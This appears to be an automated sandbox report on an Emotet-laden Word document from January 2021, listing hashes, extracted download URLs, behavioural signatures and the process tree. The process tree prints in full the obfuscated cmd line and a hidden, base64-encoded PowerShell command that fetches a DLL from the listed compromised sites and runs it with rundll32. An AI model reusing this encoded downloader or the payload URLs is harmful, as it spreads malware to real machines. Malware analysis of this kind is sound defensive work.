Analysis
-
max time kernel
49s -
max time network
23s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
21-01-2021 02:14
Behavioral task
behavioral1
Sample
emotet_e2_6696dcee2f90b0c3f0614d8197a15ce194e31f0940e923dd5f9bb95fb42fa479_2021-01-21__021312918859._fpx.doc
Resource
win10v20201028
General
-
Target
emotet_e2_6696dcee2f90b0c3f0614d8197a15ce194e31f0940e923dd5f9bb95fb42fa479_2021-01-21__021312918859._fpx.doc
-
Size
166KB
-
MD5
5075b2996ef695a07f13646f292f5731
-
SHA1
00d337d07981113a4b11501ac72ef427b5048154
-
SHA256
6696dcee2f90b0c3f0614d8197a15ce194e31f0940e923dd5f9bb95fb42fa479
-
SHA512
878c88d06e485986d28b35925f97831f01bc7251bf02ffff5f59aa89c3f80374bcf3db51f0fd9839a2179ab4dcfd645c0509b353d04f29c6bf61062c02f3f0e0
Malware Config
Extracted
http://trendmoversdubai.com/cgi-bin/B73/
http://dryaquelingrdo.com/wp-content/SI/
http://bardiastore.com/wp-admin/A1283/
http://oxycode.net/wp-admin/x/
http://fabulousstylz.net/248152296/TpI/
http://abdo-alyemeni.com/wp-admin/seG6/
http://giteslacolombiere.com/wp-admin/FV/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2000 656 cmd.exe -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 16 4068 powershell.exe -
Loads dropped DLL 1 IoCs
Processes:
rundll32.exepid process 1856 rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 988 WINWORD.EXE 988 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 4068 powershell.exe 4068 powershell.exe 4068 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 4068 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 988 WINWORD.EXE 988 WINWORD.EXE 988 WINWORD.EXE 988 WINWORD.EXE 988 WINWORD.EXE 988 WINWORD.EXE 988 WINWORD.EXE -
Suspicious use of WriteProcessMemory 9 IoCs
Processes:
cmd.exepowershell.exerundll32.exedescription pid process target process PID 2000 wrote to memory of 3812 2000 cmd.exe msg.exe PID 2000 wrote to memory of 3812 2000 cmd.exe msg.exe PID 2000 wrote to memory of 4068 2000 cmd.exe powershell.exe PID 2000 wrote to memory of 4068 2000 cmd.exe powershell.exe PID 4068 wrote to memory of 2132 4068 powershell.exe rundll32.exe PID 4068 wrote to memory of 2132 4068 powershell.exe rundll32.exe PID 2132 wrote to memory of 1856 2132 rundll32.exe rundll32.exe PID 2132 wrote to memory of 1856 2132 rundll32.exe rundll32.exe PID 2132 wrote to memory of 1856 2132 rundll32.exe rundll32.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\emotet_e2_6696dcee2f90b0c3f0614d8197a15ce194e31f0940e923dd5f9bb95fb42fa479_2021-01-21__021312918859._fpx.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:988
-
C:\Windows\system32\cmd.execmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IABTAGUAdAAgACgAIgBUAHAAIgArACIASAAiACkAIAAoACAAWwB0AHkAcABFAF0AKAAiAHsAMAB9AHsAMQB9AHsAMgB9AHsAMwB9AHsANAB9ACIALQBmACAAJwBTAFkAJwAsACcAcwB0ACcALAAnAGUAJwAsACcATQAuAEkAbwAnACwAJwAuAGQAaQByAEUAQwBUAE8AcgBZACcAKQApADsAIAAgACAAIABzAGUAVAAtAEkAdABlAE0AIAB2AEEAUgBpAGEAYgBsAEUAOgB5AE4ATwA4AGsAIAAoACAAWwB0AFkAcABFAF0AKAAiAHsAMQB9AHsAMwB9AHsAMAB9AHsANAB9AHsANQB9AHsAMgB9ACIALQBGACAAJwBzAEUAcgBWAEkAJwAsACcAcwBZAFMAdABFAG0ALgBOAGUAJwAsACcAVABNAEEAbgBhAEcAZQBSACcALAAnAHQALgAnACwAJwBDAGUAJwAsACcAUABPAGkATgAnACkAIAApACAAOwAgACQATwBjADgAcwB5AHAAawA9ACQARgA1ADQATgAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAWAA3AF8ASQA7ACQAUAA2ADEAUQA9ACgAJwBNADYAJwArACcAOABMACcAKQA7ACAAJABUAHAASAA6ADoAIgBjAFIARQBgAEEAdABlAGAARABgAGkAcgBlAEMAVABPAGAAUgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAnACsAJwAwACcAKwAnAH0ARgBxAGIAJwArACgAJwBkACcAKwAnAHcAeAAnACkAKwAnAGgAewAwAH0AUwAyAGcAaQA4ACcAKwAnADcAYgB7ADAAfQAnACkALQBmACAAWwBjAEgAQQByAF0AOQAyACkAKQA7ACQATAA4ADcARwA9ACgAJwBOACcAKwAoACcAMAA5ACcAKwAnAEcAJwApACkAOwAgACAAJABZAG4ATwA4AEsAOgA6ACIAUwBlAGMAVQByAGkAYABUAFkAcABSAG8AVABgAG8AYwBgAE8AbAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzACcAKQArACcAMQAyACcAKQA7ACQAQQA4ADEAWQA9ACgAKAAnAEYAJwArACcAMQA5ACcAKQArACcAUAAnACkAOwAkAFgANAB3AHgAbgByADEAIAA9ACAAKAAoACcAVgAyACcAKwAnADkAJwApACsAJwBUACcAKQA7ACQAUQA0ADEAVwA9ACgAJwBTADMAJwArACcANQBDACcAKQA7ACQASQBwADQAZgB3AF8AZQA9ACQASABPAE0ARQArACgAKAAoACcAUgAnACsAJwBXADAARgBxACcAKwAnAGIAJwApACsAJwBkAHcAJwArACgAJwB4AGgAJwArACcAUgAnACkAKwAoACcAVwAwACcAKwAnAFMAMgAnACsAJwBnAGkAJwApACsAKAAnADgANwBiACcAKwAnAFIAJwArACcAVwAwACcAKQApAC4AIgBSAGAARQBwAGwAQQBgAEMARQAiACgAKAAnAFIAVwAnACsAJwAwACcAKQAsAFsAcwBUAFIASQBuAGcAXQBbAEMAaABhAFIAXQA5ADIAKQApACsAJABYADQAdwB4AG4AcgAxACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABPADAAMgBVAD0AKAAoACcAQQAnACsAJwAwADgAJwApACsAJwBMACcAKQA7ACQAWAA5ADgAdgB0AHAAZAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAEoANQBqAGQAYQB0AHMAPQAoACgAJwBzAGcAIAAnACsAJwB5AHcAIAAnACkAKwAnAGEAJwArACcAaAAnACsAJwA6ACcAKwAoACcALwAvAHQAJwArACcAcgBlAG4AJwArACcAZABtAG8AJwApACsAKAAnAHYAZQByACcAKwAnAHMAZAB1ACcAKQArACcAYgBhACcAKwAnAGkAJwArACcALgBjACcAKwAnAG8AJwArACcAbQAnACsAKAAnAC8AYwAnACsAJwBnAGkALQBiAGkAbgAnACsAJwAvAEIANwAnACkAKwAoACcAMwAnACsAJwAvACEAJwApACsAJwBzACcAKwAoACcAZwAgAHkAdwAnACsAJwAgACcAKQArACcAYQAnACsAKAAnAGgAOgAvAC8AJwArACcAZAByAHkAYQBxAHUAZQAnACsAJwBsACcAKwAnAGkAJwApACsAJwBuACcAKwAnAGcAJwArACcAcgAnACsAJwBkACcAKwAnAG8ALgAnACsAJwBjACcAKwAoACcAbwAnACsAJwBtAC8AdwBwAC0AJwArACcAYwBvACcAKwAnAG4AdABlAG4AdAAnACsAJwAvAFMAJwApACsAKAAnAEkALwAhACcAKwAnAHMAJwApACsAJwBnACAAJwArACgAJwB5AHcAJwArACcAIABhAGgAOgAvACcAKwAnAC8AYgBhAHIAJwArACcAZAAnACsAJwBpAGEAJwApACsAJwBzACcAKwAoACcAdABvACcAKwAnAHIAJwArACcAZQAuAGMAbwAnACkAKwAoACcAbQAvAHcAcAAtAGEAJwArACcAZAAnACsAJwBtACcAKQArACgAJwBpAG4ALwAnACsAJwBBADEAMgAnACsAJwA4ADMAJwApACsAKAAnAC8AIQAnACsAJwBzAGcAIAB5ACcAKQArACgAJwB3ACcAKwAnACAAYQBoACcAKQArACgAJwA6AC8ALwAnACsAJwBvAHgAeQBjACcAKQArACcAbwAnACsAJwBkAGUAJwArACgAJwAuAG4AJwArACcAZQAnACkAKwAoACcAdAAvACcAKwAnAHcAJwApACsAJwBwAC0AJwArACcAYQAnACsAJwBkACcAKwAnAG0AaQAnACsAJwBuAC8AJwArACgAJwB4ACcAKwAnAC8AIQAnACkAKwAoACcAcwAnACsAJwBnACAAeQAnACkAKwAoACcAdwAnACsAJwAgAGEAaAAnACkAKwAnADoALwAnACsAKAAnAC8AZgBhACcAKwAnAGIAdQAnACsAJwBsAG8AJwApACsAKAAnAHUAcwBzAHQAeQBsAHoALgAnACsAJwBuACcAKwAnAGUAJwApACsAJwB0ACcAKwAoACcALwAyADQAOAAxADUAJwArACcAMgAnACsAJwAyADkANgAvAFQAJwArACcAcABJAC8AIQAnACsAJwBzAGcAJwArACcAIAB5ACcAKwAnAHcAIABhAGgAOgAnACkAKwAoACcALwAvACcAKwAnAGEAYgAnACsAJwBkAG8AJwApACsAJwAtAGEAJwArACcAbAB5ACcAKwAoACcAZQAnACsAJwBtAGUAJwApACsAJwBuACcAKwAnAGkAJwArACcALgBjACcAKwAoACcAbwBtAC8AJwArACcAdwAnACsAJwBwAC0AYQBkAG0AJwApACsAJwBpAG4AJwArACgAJwAvAHMAJwArACcAZQBHADYALwAnACkAKwAnACEAJwArACcAcwAnACsAJwBnACcAKwAoACcAIAB5AHcAIABhACcAKwAnAGgAJwArACcAOgAnACkAKwAnAC8AJwArACgAJwAvAGcAJwArACcAaQB0ACcAKQArACcAZQAnACsAKAAnAHMAJwArACcAbABhAGMAJwApACsAJwBvACcAKwAnAGwAJwArACgAJwBvAG0AYgBpAGUAJwArACcAcgBlACcAKQArACcALgBjACcAKwAoACcAbwBtAC8AdwAnACsAJwBwAC0AYQAnACsAJwBkACcAKwAnAG0AJwApACsAKAAnAGkAJwArACcAbgAvACcAKQArACgAJwBGAFYAJwArACcALwAnACkAKQAuACIAUgBlAFAAbABgAEEAYwBlACIAKAAoACgAJwBzAGcAJwArACcAIAB5ACcAKQArACcAdwAnACsAKAAnACAAJwArACcAYQBoACcAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwBuAGoAJwAsACcAdAByACcAKQAsACcAeQBqACcALAAnAHMAYwAnACwAJABYADkAOAB2AHQAcABkACwAJwB3AGQAJwApAFsAMwBdACkALgAiAFMAYABQAGwASQBUACIAKAAkAFgANgAyAEkAIAArACAAJABPAGMAOABzAHkAcABrACAAKwAgACQASwA5ADIARAApADsAJABKADAAMABGAD0AKAAnAEUAJwArACgAJwA5ACcAKwAnAF8ATwAnACkAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQATAA5AHkAagBxAGkAcwAgAGkAbgAgACQASgA1AGoAZABhAHQAcwApAHsAdAByAHkAewAoACYAKAAnAE4AZQB3AC0AJwArACcATwBiAGoAZQAnACsAJwBjAHQAJwApACAAUwB5AFMAdABlAE0ALgBOAGUAdAAuAHcARQBCAGMATABpAEUAbgBUACkALgAiAEQAYABvAHcAbgBgAGwATwBhAGQAZgBpAEwARQAiACgAJABMADkAeQBqAHEAaQBzACwAIAAkAEkAcAA0AGYAdwBfAGUAKQA7ACQAVgAzAF8ATAA9ACgAKAAnAEoAJwArACcAXwBfACcAKQArACcAVQAnACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQAnACsAJwBJAHQAZQAnACsAJwBtACcAKQAgACQASQBwADQAZgB3AF8AZQApAC4AIgBMAEUATgBHAGAAVABIACIAIAAtAGcAZQAgADMANQAzADgANQApACAAewAuACgAJwByAHUAbgBkAGwAJwArACcAbAAzADIAJwApACAAJABJAHAANABmAHcAXwBlACwAKAAoACcAQQBuACcAKwAnAHkAJwApACsAKAAnAFMAdAByACcAKwAnAGkAbgAnACkAKwAnAGcAJwApAC4AIgB0AGAATwBzAGAAVAByAGkAbgBnACIAKAApADsAJABLADQAMABFAD0AKAAnAEYAOQAnACsAJwAzAEcAJwApADsAYgByAGUAYQBrADsAJABDADQAMQBFAD0AKAAnAFoAJwArACgAJwAwADkAJwArACcAUQAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAWAAyADMAQgA9ACgAKAAnAFAAOAAnACsAJwA3ACcAKQArACcASQAnACkA1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2000 -
C:\Windows\system32\msg.exemsg Admin /v Word experienced an error trying to open the file.2⤵PID:3812
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w hidden -enc IABTAGUAdAAgACgAIgBUAHAAIgArACIASAAiACkAIAAoACAAWwB0AHkAcABFAF0AKAAiAHsAMAB9AHsAMQB9AHsAMgB9AHsAMwB9AHsANAB9ACIALQBmACAAJwBTAFkAJwAsACcAcwB0ACcALAAnAGUAJwAsACcATQAuAEkAbwAnACwAJwAuAGQAaQByAEUAQwBUAE8AcgBZACcAKQApADsAIAAgACAAIABzAGUAVAAtAEkAdABlAE0AIAB2AEEAUgBpAGEAYgBsAEUAOgB5AE4ATwA4AGsAIAAoACAAWwB0AFkAcABFAF0AKAAiAHsAMQB9AHsAMwB9AHsAMAB9AHsANAB9AHsANQB9AHsAMgB9ACIALQBGACAAJwBzAEUAcgBWAEkAJwAsACcAcwBZAFMAdABFAG0ALgBOAGUAJwAsACcAVABNAEEAbgBhAEcAZQBSACcALAAnAHQALgAnACwAJwBDAGUAJwAsACcAUABPAGkATgAnACkAIAApACAAOwAgACQATwBjADgAcwB5AHAAawA9ACQARgA1ADQATgAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAWAA3AF8ASQA7ACQAUAA2ADEAUQA9ACgAJwBNADYAJwArACcAOABMACcAKQA7ACAAJABUAHAASAA6ADoAIgBjAFIARQBgAEEAdABlAGAARABgAGkAcgBlAEMAVABPAGAAUgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAnACsAJwAwACcAKwAnAH0ARgBxAGIAJwArACgAJwBkACcAKwAnAHcAeAAnACkAKwAnAGgAewAwAH0AUwAyAGcAaQA4ACcAKwAnADcAYgB7ADAAfQAnACkALQBmACAAWwBjAEgAQQByAF0AOQAyACkAKQA7ACQATAA4ADcARwA9ACgAJwBOACcAKwAoACcAMAA5ACcAKwAnAEcAJwApACkAOwAgACAAJABZAG4ATwA4AEsAOgA6ACIAUwBlAGMAVQByAGkAYABUAFkAcABSAG8AVABgAG8AYwBgAE8AbAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzACcAKQArACcAMQAyACcAKQA7ACQAQQA4ADEAWQA9ACgAKAAnAEYAJwArACcAMQA5ACcAKQArACcAUAAnACkAOwAkAFgANAB3AHgAbgByADEAIAA9ACAAKAAoACcAVgAyACcAKwAnADkAJwApACsAJwBUACcAKQA7ACQAUQA0ADEAVwA9ACgAJwBTADMAJwArACcANQBDACcAKQA7ACQASQBwADQAZgB3AF8AZQA9ACQASABPAE0ARQArACgAKAAoACcAUgAnACsAJwBXADAARgBxACcAKwAnAGIAJwApACsAJwBkAHcAJwArACgAJwB4AGgAJwArACcAUgAnACkAKwAoACcAVwAwACcAKwAnAFMAMgAnACsAJwBnAGkAJwApACsAKAAnADgANwBiACcAKwAnAFIAJwArACcAVwAwACcAKQApAC4AIgBSAGAARQBwAGwAQQBgAEMARQAiACgAKAAnAFIAVwAnACsAJwAwACcAKQAsAFsAcwBUAFIASQBuAGcAXQBbAEMAaABhAFIAXQA5ADIAKQApACsAJABYADQAdwB4AG4AcgAxACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABPADAAMgBVAD0AKAAoACcAQQAnACsAJwAwADgAJwApACsAJwBMACcAKQA7ACQAWAA5ADgAdgB0AHAAZAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAEoANQBqAGQAYQB0AHMAPQAoACgAJwBzAGcAIAAnACsAJwB5AHcAIAAnACkAKwAnAGEAJwArACcAaAAnACsAJwA6ACcAKwAoACcALwAvAHQAJwArACcAcgBlAG4AJwArACcAZABtAG8AJwApACsAKAAnAHYAZQByACcAKwAnAHMAZAB1ACcAKQArACcAYgBhACcAKwAnAGkAJwArACcALgBjACcAKwAnAG8AJwArACcAbQAnACsAKAAnAC8AYwAnACsAJwBnAGkALQBiAGkAbgAnACsAJwAvAEIANwAnACkAKwAoACcAMwAnACsAJwAvACEAJwApACsAJwBzACcAKwAoACcAZwAgAHkAdwAnACsAJwAgACcAKQArACcAYQAnACsAKAAnAGgAOgAvAC8AJwArACcAZAByAHkAYQBxAHUAZQAnACsAJwBsACcAKwAnAGkAJwApACsAJwBuACcAKwAnAGcAJwArACcAcgAnACsAJwBkACcAKwAnAG8ALgAnACsAJwBjACcAKwAoACcAbwAnACsAJwBtAC8AdwBwAC0AJwArACcAYwBvACcAKwAnAG4AdABlAG4AdAAnACsAJwAvAFMAJwApACsAKAAnAEkALwAhACcAKwAnAHMAJwApACsAJwBnACAAJwArACgAJwB5AHcAJwArACcAIABhAGgAOgAvACcAKwAnAC8AYgBhAHIAJwArACcAZAAnACsAJwBpAGEAJwApACsAJwBzACcAKwAoACcAdABvACcAKwAnAHIAJwArACcAZQAuAGMAbwAnACkAKwAoACcAbQAvAHcAcAAtAGEAJwArACcAZAAnACsAJwBtACcAKQArACgAJwBpAG4ALwAnACsAJwBBADEAMgAnACsAJwA4ADMAJwApACsAKAAnAC8AIQAnACsAJwBzAGcAIAB5ACcAKQArACgAJwB3ACcAKwAnACAAYQBoACcAKQArACgAJwA6AC8ALwAnACsAJwBvAHgAeQBjACcAKQArACcAbwAnACsAJwBkAGUAJwArACgAJwAuAG4AJwArACcAZQAnACkAKwAoACcAdAAvACcAKwAnAHcAJwApACsAJwBwAC0AJwArACcAYQAnACsAJwBkACcAKwAnAG0AaQAnACsAJwBuAC8AJwArACgAJwB4ACcAKwAnAC8AIQAnACkAKwAoACcAcwAnACsAJwBnACAAeQAnACkAKwAoACcAdwAnACsAJwAgAGEAaAAnACkAKwAnADoALwAnACsAKAAnAC8AZgBhACcAKwAnAGIAdQAnACsAJwBsAG8AJwApACsAKAAnAHUAcwBzAHQAeQBsAHoALgAnACsAJwBuACcAKwAnAGUAJwApACsAJwB0ACcAKwAoACcALwAyADQAOAAxADUAJwArACcAMgAnACsAJwAyADkANgAvAFQAJwArACcAcABJAC8AIQAnACsAJwBzAGcAJwArACcAIAB5ACcAKwAnAHcAIABhAGgAOgAnACkAKwAoACcALwAvACcAKwAnAGEAYgAnACsAJwBkAG8AJwApACsAJwAtAGEAJwArACcAbAB5ACcAKwAoACcAZQAnACsAJwBtAGUAJwApACsAJwBuACcAKwAnAGkAJwArACcALgBjACcAKwAoACcAbwBtAC8AJwArACcAdwAnACsAJwBwAC0AYQBkAG0AJwApACsAJwBpAG4AJwArACgAJwAvAHMAJwArACcAZQBHADYALwAnACkAKwAnACEAJwArACcAcwAnACsAJwBnACcAKwAoACcAIAB5AHcAIABhACcAKwAnAGgAJwArACcAOgAnACkAKwAnAC8AJwArACgAJwAvAGcAJwArACcAaQB0ACcAKQArACcAZQAnACsAKAAnAHMAJwArACcAbABhAGMAJwApACsAJwBvACcAKwAnAGwAJwArACgAJwBvAG0AYgBpAGUAJwArACcAcgBlACcAKQArACcALgBjACcAKwAoACcAbwBtAC8AdwAnACsAJwBwAC0AYQAnACsAJwBkACcAKwAnAG0AJwApACsAKAAnAGkAJwArACcAbgAvACcAKQArACgAJwBGAFYAJwArACcALwAnACkAKQAuACIAUgBlAFAAbABgAEEAYwBlACIAKAAoACgAJwBzAGcAJwArACcAIAB5ACcAKQArACcAdwAnACsAKAAnACAAJwArACcAYQBoACcAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwBuAGoAJwAsACcAdAByACcAKQAsACcAeQBqACcALAAnAHMAYwAnACwAJABYADkAOAB2AHQAcABkACwAJwB3AGQAJwApAFsAMwBdACkALgAiAFMAYABQAGwASQBUACIAKAAkAFgANgAyAEkAIAArACAAJABPAGMAOABzAHkAcABrACAAKwAgACQASwA5ADIARAApADsAJABKADAAMABGAD0AKAAnAEUAJwArACgAJwA5ACcAKwAnAF8ATwAnACkAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQATAA5AHkAagBxAGkAcwAgAGkAbgAgACQASgA1AGoAZABhAHQAcwApAHsAdAByAHkAewAoACYAKAAnAE4AZQB3AC0AJwArACcATwBiAGoAZQAnACsAJwBjAHQAJwApACAAUwB5AFMAdABlAE0ALgBOAGUAdAAuAHcARQBCAGMATABpAEUAbgBUACkALgAiAEQAYABvAHcAbgBgAGwATwBhAGQAZgBpAEwARQAiACgAJABMADkAeQBqAHEAaQBzACwAIAAkAEkAcAA0AGYAdwBfAGUAKQA7ACQAVgAzAF8ATAA9ACgAKAAnAEoAJwArACcAXwBfACcAKQArACcAVQAnACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQAnACsAJwBJAHQAZQAnACsAJwBtACcAKQAgACQASQBwADQAZgB3AF8AZQApAC4AIgBMAEUATgBHAGAAVABIACIAIAAtAGcAZQAgADMANQAzADgANQApACAAewAuACgAJwByAHUAbgBkAGwAJwArACcAbAAzADIAJwApACAAJABJAHAANABmAHcAXwBlACwAKAAoACcAQQBuACcAKwAnAHkAJwApACsAKAAnAFMAdAByACcAKwAnAGkAbgAnACkAKwAnAGcAJwApAC4AIgB0AGAATwBzAGAAVAByAGkAbgBnACIAKAApADsAJABLADQAMABFAD0AKAAnAEYAOQAnACsAJwAzAEcAJwApADsAYgByAGUAYQBrADsAJABDADQAMQBFAD0AKAAnAFoAJwArACgAJwAwADkAJwArACcAUQAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAWAAyADMAQgA9ACgAKAAnAFAAOAAnACsAJwA3ACcAKQArACcASQAnACkA2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4068 -
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Users\Admin\Fqbdwxh\S2gi87b\V29T.dll,AnyString3⤵
- Suspicious use of WriteProcessMemory
PID:2132 -
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Users\Admin\Fqbdwxh\S2gi87b\V29T.dll,AnyString4⤵
- Loads dropped DLL
PID:1856
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\Fqbdwxh\S2gi87b\V29T.dllMD5
db6b1b751143235793c97e2060753b03
SHA172c2dd8d677a9bbc86e624383d42fd0496144a5c
SHA25601e14d7d7d88ef53d4f9443170bff682dc9c72f13451c18c9032a5e440975e98
SHA512b637c6554f875cdbfe67673969b39f672ce4f5b4cf3da0a79e2bf151d878d4fb5edec4759018a8e7f1e2362ee11cf4e35760ba4cf13ba738474818e8cc94c96c
-
\Users\Admin\Fqbdwxh\S2gi87b\V29T.dllMD5
db6b1b751143235793c97e2060753b03
SHA172c2dd8d677a9bbc86e624383d42fd0496144a5c
SHA25601e14d7d7d88ef53d4f9443170bff682dc9c72f13451c18c9032a5e440975e98
SHA512b637c6554f875cdbfe67673969b39f672ce4f5b4cf3da0a79e2bf151d878d4fb5edec4759018a8e7f1e2362ee11cf4e35760ba4cf13ba738474818e8cc94c96c
-
memory/988-3-0x00007FF9F0570000-0x00007FF9F0580000-memory.dmpFilesize
64KB
-
memory/988-4-0x00007FF9F0570000-0x00007FF9F0580000-memory.dmpFilesize
64KB
-
memory/988-5-0x00007FFA0F720000-0x00007FFA0FD57000-memory.dmpFilesize
6.2MB
-
memory/988-6-0x00007FF9F0570000-0x00007FF9F0580000-memory.dmpFilesize
64KB
-
memory/988-2-0x00007FF9F0570000-0x00007FF9F0580000-memory.dmpFilesize
64KB
-
memory/1856-17-0x0000000000000000-mapping.dmp
-
memory/2132-15-0x0000000000000000-mapping.dmp
-
memory/3812-7-0x0000000000000000-mapping.dmp
-
memory/4068-10-0x0000017BEBEA0000-0x0000017BEBEA1000-memory.dmpFilesize
4KB
-
memory/4068-13-0x0000017BEC1E0000-0x0000017BEC1E1000-memory.dmpFilesize
4KB
-
memory/4068-14-0x0000017BEBF56000-0x0000017BEBF58000-memory.dmpFilesize
8KB
-
memory/4068-12-0x0000017BEBF53000-0x0000017BEBF55000-memory.dmpFilesize
8KB
-
memory/4068-11-0x0000017BEBF50000-0x0000017BEBF52000-memory.dmpFilesize
8KB
-
memory/4068-9-0x00007FFA089A0000-0x00007FFA0938C000-memory.dmpFilesize
9.9MB
-
memory/4068-8-0x0000000000000000-mapping.dmp